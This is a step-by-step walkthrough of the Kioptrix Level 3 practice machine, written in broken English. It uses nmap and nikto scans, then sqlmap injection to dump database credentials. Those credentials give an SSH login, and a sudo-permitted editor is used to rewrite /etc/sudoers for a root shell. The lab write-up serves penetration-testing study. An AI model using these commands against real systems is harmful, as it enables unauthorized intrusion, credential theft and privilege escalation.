Kioptrix: Level 3 Machine walkthrough ...... Step by Step



.  ....................... ....... Kioptix Level 3 crack Machine/...................................... 


  Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37).

   PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12)

   HTTP TRACE method is active, suggesting the host is vulnerable to XST (Cross-site tracing)

   sql injection in kioptix gallery ...............


   1)  netdiscover -i wlan0/eth0 -r <ip range>

   2)  nmap  -sV -A <put your kioptix3 ip > ("nmap scan your port and services")
   
  3)  nikto -h <kioptix3 ip>   ("nikto is best scan your web server")

     #This ip running on webserver......... goto webserver  type kioptrix3 ip ..
    
    #go to blog .. more info just down..


  4)  http://192.168.43.26/index.php?system=Blog ("goto blog and scroll down and click. "http://kioptrix3.com/gallery")

   5)  http://kioptrix3.com/gallery ("open your browsers.. ")
      
      # goto gallery tab and click "Ligoat Press Room" and scroll down show your "shorting options"
      # then select photo id 

      

    

   6)  http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos
  
      #this kioptrix3 is vulnerble because php?id=1 is performs.......
      
    
  7)  http://kioptrix3.com/gallery/gallery.php?id=1

       #we use sqlmap because we dump username, password go to sqlmap 
  8)  slqmap -u http://kioptrix3.com/gallery/gallery.php?id=1 --dbs
   
     #This commond type your terminal and find 3 Database. 

      #we Jump gallery Database because username ,passwd store in gallery Database.
  9)  sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery --tables
  10)  sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -T  dev_accounts  --columns
  
  11)  sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -T  dev_accounts  -C id,password,username --dump

       #we found username there are two username dreg,loneferret 
       
       # we found password Mast3r and starwars

   12)  we connect ssh service because ssh is enable....

   13)  ssh loneferret@192.168.43.26 

       #loneferret is username we type your terminal ..
    
     #then type your password and you connect leve3 machine .

  14)   cat /etc/sudoers  

        #This commond type in terminal machine
   

   15)   cat: /etc/sudoers: Permission denied 
       
        goto  loneferret 
  16)  cd loneferret
     
       #ls -la types in machine terminal 
  17)  cat CompanyPolicy.README 

        Hello new employee,
       It is company policy here to use our newly installed software for editing, creating and viewing files.
       Please use the command 'sudo ht'.
       Failure to do so will result in you immediate termination.

 18)   sudo ht "not open file ."

        #then type commond 
  19)  export TERM=xterm 


   20)  sudo ht   

        #type in terminal and open confrigesion file
       
       


   21)  search /etc/sudoers 

         # add your shell "/bin/sh"

  22)/bin/sh  "its add /etc/sudoers" 

      # then save it and quit it file .
     

   23) sudo /bin/sh 

       #this commond type in terminal 

       #go to shell 
   
      # and type

  24) whoami 

  25) ifconfig 


     ........Best of Luck.................

Comments

Post a Comment

Popular Posts